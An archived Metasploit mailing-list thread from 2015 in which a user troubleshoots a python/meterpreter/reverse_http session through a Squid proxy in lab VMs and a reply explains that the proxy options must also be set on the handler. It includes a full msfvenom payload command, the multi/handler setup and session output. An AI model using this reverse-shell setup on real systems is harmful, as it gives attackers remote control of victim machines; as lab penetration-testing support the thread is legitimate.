Metasploit mailing list archives

Previous By Date Next
Previous By Thread Next

Re: framework Digest, Vol 83, Issue 1

From: Spencer McIntyre <zerosteiner () gmail com>
Date: Tue, 03 Mar 2015 18:47:31 +0000
Mike Jones!

The PROXYHOST and PROXYPORT must also be set in the handler. This is
because when the stage is sent, the proxy settings are patched in by the
instance of Metasploit running on the attackers system when it is requested
by the stager. Because of this, it's necessary to set the PROXYHOST and
PROXYPORT options to the same values on the handler as was specified when
creating the payload with msfvenom.

If when the proxy options are set the session still does not respond, it's
possible there is another issue and opening a ticket on GitHub with the
output would be helpful for tracking.
https://github.com/rapid7/metasploit-framework/issues

I hope that helps Mike Jones!

On Tue, Mar 3, 2015 at 1:00 PM <framework-request () spool metasploit com>
wrote:


Send framework mailing list submissions to
        framework () spool metasploit com

To subscribe or unsubscribe via the World Wide Web, visit
        https://dev.metasploit.com/mailman/listinfo/framework
or, via email, send a message with subject or body 'help' to
        framework-request () spool metasploit com

You can reach the person managing the list at
        framework-owner () spool metasploit com

When replying, please edit your Subject line so it is more specific
than "Re: Contents of framework digest..."


Today's Topics:

   1. python/meterpreter/reverse_http timeout (Mike Jones!)


----------------------------------------------------------------------

Message: 1
Date: Mon, 2 Mar 2015 12:35:01 -0800
From: "Mike Jones!" <property.of.mike.jones () gmail com>
To: framework <framework () spool metasploit com>
Subject: [framework] python/meterpreter/reverse_http timeout
Message-ID:
        <CAGZNKFsAxyymTa=LBa9KrK+JxeceyLT6nUU1wrhWXzxiU7YtEQ@mail.
gmail.com>
Content-Type: text/plain; charset="utf-8"

I'm testing payloads through a proxy in my VMs and can't get any
meterpreter commands to work after the session opens.  All VMs are running
Debian.

Victim: 10.17.24.128
Proxy: 10.17.24.10 and 172.16.22.10 (running Squid)
Attacker: 172.16.22.22

I've generated a payload with msfvenom:
msfvenom -p python/meterpreter/reverse_http LHOST=172.16.22.22 LPORT=8080
PROXYHOST=10.17.24.10 PROXYPORT=3128

Set up a handler:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD python/meterpreter/reverse_http
PAYLOAD => python/meterpreter/reverse_http
msf exploit(handler) > set LHOST 172.16.22.22
LHOST => 172.16.22.22
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > exploit -j

Executing the payload on the victim looks fine.  Session hits on
metasploit, and I can interact with it but none of the commands respond:
msf exploit(handler) > [*] 172.16.22.10:52399 Request received for
/x5LW...
[*] Meterpreter session 1 opened (172.16.22.22:8080 -> 172.16.22.10:52399)
at 2015-03-02 14:12:10 -0600
sessions -l

Active sessions
===============

  Id  Type                       Information  Connection
  --  ----                       -----------  ----------
  1   meterpreter python/python               172.16.22.22:8080 ->
172.16.22.10:52399 (172.16.22.10)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps
[-] Error running command ps: Rex::TimeoutError Operation timed out.

I tried setting up the handler with and without PROXYHOST and PROXYPORT,
neither way worked, though I suspect without those values is the correct
approach.  What am I missing?

Thanks in advance.
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://dev.metasploit.com/pipermail/framework/attachments/
20150302/3f873c79/attachment-0001.html>

------------------------------

Subject: Digest Footer

_______________________________________________
framework mailing list
framework () spool metasploit com
https://dev.metasploit.com/mailman/listinfo/framework


------------------------------

End of framework Digest, Vol 83, Issue 1
****************************************


_______________________________________________
https://dev.metasploit.com/mailman/listinfo/framework
Previous By Date Next
Previous By Thread Next

Current thread: